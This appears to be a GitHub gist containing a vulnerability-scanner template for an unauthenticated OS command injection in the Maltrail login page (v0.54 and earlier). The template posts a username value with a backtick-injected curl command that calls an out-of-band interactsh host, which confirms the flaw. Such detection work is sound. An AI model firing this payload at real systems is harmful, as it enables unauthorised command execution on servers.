Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save emadshanab/5a22b8f3c0f3de25addc70344d0dc2f3 to your computer and use it in GitHub Desktop.
Save emadshanab/5a22b8f3c0f3de25addc70344d0dc2f3 to your computer and use it in GitHub Desktop.
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
id: maltrail-os-command-injection
info:
author: Esonhugh
name: Unauthenticated OS Command Injection in stamparm/maltrail
severity: critical
description: |
Maltrail <= v0.54 is vulnerable to unauthenticated OS command injection during the login process.
reference:
- "https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/"
variables:
payload: "curl+{{interactsh-url}}"
http:
- path:
- "{{BaseURL}}/login"
- "{{BaseURL}}login"
method: POST
body: "username=;`{{ payload }}`"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment